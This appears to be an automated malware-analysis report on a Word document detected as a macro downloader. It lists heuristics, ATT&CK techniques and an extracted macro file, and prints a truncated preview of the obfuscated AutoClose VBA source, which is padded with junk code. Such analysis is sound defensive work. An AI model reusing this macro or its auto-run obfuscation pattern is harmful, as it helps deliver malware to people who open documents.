MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Valyria-6595163-0, indicating it's a downloader. The presence of a VBA AutoClose macro, which is designed to execute automatically when the document is closed, strongly suggests malicious intent. This macro likely attempts to download and execute a second-stage payload, a common technique for malware distribution.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44088 bytes |
SHA-256: 397c0f829cb70ccf41802e3edf0fe35038e1457b1ee2c91a169771ba793cd866 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
mOrYvYzYwyLAgABUxeXYME = "PIopoKaqOTeveNAKolYa"
FOmOBehEZeKEaiOS = 47318
Dim zUDaZaSoalUfIx
sigEzYvihoaeJYXejw = "sEFuMakyS"
Dim xAtEmyLOwPAaETeainIc
For xAtEmyLOwPAaETeainIc = 8 To 12
Dim gOqAQopazoTEFEVYwIfG
gOqAQopazoTEFEVYwIfG = Fix(87552)
Next
zUDaZaSoalUfIx = 37697
Dim DeVecOiegYuXETTUME
Dim BeCYtyhAnOREminyNY
For BeCYtyhAnOREminyNY = 7 To 11
Dim hasYPimeMycex
hasYPimeMycex = Fix(3455)
Next
sihtuGuGASymPAR = "GowuBaHODaTz"
duTegenAaofeQREtJOK = Val("75394") & "zOLUQUtIKOiiJTUxu"
DeVecOiegYuXETTUME = 2276
On Error Resume Next
Dim qetIKOFOrUieLIBIrURol
For qetIKOFOrUieLIBIrURol = 3 To 11
Dim GYBiqIiiURAycIP
GYBiqIiiURAycIP = Fix(22215)
Next
XiPadiWoMAZyMefoweWy = 44454
FYdImeNVYqUQYi = "KiKUmulUZIdeV"
FobIQASeSuGEq = 53049
DOfUgUCyDI = "pinIDEJUNe"
CInugAZysepY = 46713
Dim zePyZykymasOMeKyBo
zePyZykymasOMeKyBo = 20658
Dim LUfyLIJUwuxiHyXuMeQi
For LUfyLIJUwuxiHyXuMeQi = 9 To 11
Dim cYxiHABUZACizacoGOGiw
cYxiHABUZACizacoGOGiw = Fix(94101)
Next
Dim gofEOJaGiZeP
For gofEOJaGiZeP = 6 To 13
Dim MeGonUxoi
MeGonUxoi = Fix(42429)
Next
Dim XYVoXyGIPikAKiVASuF
WIQYiYvAtifuvEwI = Val("96385") & "jyZKIciSAlyjyny"
Dim geMItiLeserIcNy
For geMItiLeserIcNy = 3 To 11
Dim eSypuFykesalyj
eSypuFykesalyj = Fix(91819)
Next
sinAZApiqeSlYH = Val("37401") & "ZoRyMoJEpyPUjIgoRUfemO"
For XYVoXyGIPikAKiVASuF = 9 To 11
ciJHTYJEViHaEfKYm = 51086
DYnoWiGmyOGaB = 93212
Dim FecANABUma
FecANABUma = 21227
Dim iyZUiYlOaySumUheJep
PExeQiIhoJirugAFA = 33821
Dim zyqoPuiOL
zyqoPuiOL = 36827
Dim HefEMUNUCYKV
HefEMUNUCYKV = 39171
iyZUiYlOaySumUheJep = Fix(85113)
aaSYKAcibODAK = Val("18615") & "zeMyBEryZopIPeGUXa"
WUqfoaoNyqATejoqiHYd = "cPAhifoDOSOSah"
zEggojaJEwAzeHucAZ = 74529
Next
BicKidepiXiCOtaiyQaKa = StrReverse(LTrim(""))
aIqaBuvYceKaR = 78617
WYKApizYai = 58191
HIZoNAtUvoM = Val("11569") & "QOZamAlOtykoIquauKY"
Dim RIkYrupYRiMo
RIkYrupYRiMo = 7291
RESeXIHoHATAheUtaF = "rErFuquabOcyS"
Dim kywZQaFyaINO
todySIPeTATutApILYF = 66517
kywZQaFyaINO = 47622
Dim LAfavAwY
LAfavAwY = 15491
Dim nEQEjsiaIcukUaY
For nEQEjsiaIcukUaY = 5 To 11
Dim JImUTAgoPU
JImUTAgoPU = Fix(5324)
Next
Dim PavceloT
For PavceloT = 3 To 12
Dim MyvIhoviMarePamYGuh
MyvIhoviMarePamYGuh = Fix(92602)
Next
Dim LUzOSakizEhAwOL
Dim NOWOwABYjiTOpImetk
NOWOwABYjiTOpImetk = 71207
iimaKuiYtOfOGciRaNo = "CuSeXYVEvYjEcypu"
For LUzOSakizEhAwOL = 5 To 11
Dim aLaciQkUboBi
aywObzaBiBiqoMoXY = "waHOaEreJOkETul"
Dim cyHCATAboNYMa
cyHCATAboNYMa = 62410
Dim QakkOzyFMok
For QakkOzyFMok = 7 To 11
Dim aefInacYvyTOfoH
aefInacYvyTOfoH = Fix(24288)
Next
aLaciQkUboBi = Fix(27942)
HOfYQoKuxIaObu = Val("363") & "xEjuTUQYLYtaDAloxEMEX"
LOPAFYJYDeTeK = "jUIbyaoKUSolEteLEvaJ"
Next
GAPAmUCUJdUseiyDyB = 37022
BEreWETEnyYvybidy = 26564
Dim mOaUhEnAJuILaGUP
KAdwICoQYj = "KUbOWIVadIgUpAn"
qaHeVevaFEianEzUMX = Val("24545") & "lGOkEcYqEmatEnOHAVE"
xufariMawola = 92507
For mOaUhEnAJuILaGUP = 9 To 12
vEqykoSoSUmlEiYq = 86353
HYLOWuHaNOSygyRO = 32843
Dim niTorYcUMYgACABov
Dim SweRaINUGEPaHi
For SweRaINUGEPaHi = 7 To 11
Dim MiZakOdAJAMitIDiguWUL
MiZakOdAJAMitIDiguWUL = Fix(75807)
Next
niTorYcUMYgACABov = Fix(68945)
Next
Dim gYKyxytEGyTIfATA
MIYvuJAk = "XfURARatywavOQYxu"
For gYKyxytEGyTIfATA = 8 To 10
Dim HyvyTUrYiI
qoGuTAsQOTicaniJYsUU = "HexApEQuBidAMU"
Dim KypucEwyNEPAqiNUGev
KypucEwyNEPAqiNUGev = 6989
HidesYjiRANOWUkYB = 88082
HyvyTUrYiI = Fix(85423)
Dim neulAPUtaXeRyaev
neulAPUtaXeRyaev = 57657
Next
xAziCeWaQe = "PiJOrezAKGYSenE"
FguaHOlIvOaaFirEPo = 70238
ierUqEmAkUCESOf = Val("15223") & "dUjOcoTAfOgyGarO"
Dim XAhuSeiUqygyLYZAV
Dim mUnUHykoiCa
mUnUHykoiCa = 49639
DEWAtAbemYRorYdUNeLak = "XAGY
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.